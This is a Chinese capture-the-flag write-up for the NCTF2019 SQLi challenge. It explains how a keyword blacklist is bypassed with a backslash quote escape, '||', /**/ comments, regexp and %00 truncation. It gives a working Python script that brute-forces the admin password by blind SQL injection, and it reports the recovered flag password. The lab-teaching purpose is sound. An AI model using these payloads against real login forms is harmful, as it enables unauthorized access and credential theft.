[NCTF2019]SQLi

news2024/11/27 6:13:07

进来就有个弹窗

甚至给了sql语句

sqlquery : select * from users where username='' and passwd=''

先扫一下目录，发现有个robots.txt

提示有个hint.txt

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

看到有黑名单，拿到admin的密码就可以获得flag

知识点：

;%00代替注释符/00截断
转义符“\”没被过滤，可以转义符转义username处的单引号，我们提交的用户名就变成了 ’ and passwd=

select * from users where username='' and passwd='' #登录框处查询语句

username=\&passwd=||(passwd/**/regexp/**/"^y");%00 #用户名输入\，密码输入“或”符号加括号、内联绕waf，及结尾截断。

sqlquery : select * from users where username='\' and passwd='||/**/passwd/**/regexp/**/"^y";

相等于select * from users where (passwd/**/regexp/**/"^y");

脚本：

#coding:utf-8
import requests
import string
import time
url = "http://d0c2931b-a28b-4380-9b1b-f63b2d3c408d.node4.buuoj.cn:81/"

password = ""

string = '_' + string.ascii_lowercase + string.digits
for i in range(1,50):
    print(i)
    for j in string:
        data1 = {
            'username':'\\',
            'passwd':'||passwd/**/regexp/**/"^{}";\x00'.format(password+j)
        }
        print(data1)
        res = requests.post(url = url , data = data1)
        if r"welcome.php" in res.text:
            password+=j
            print(password)
            break
        elif res.status_code == 429:
            time.sleep(0.5)

得到密码为：you_will_never_know7788990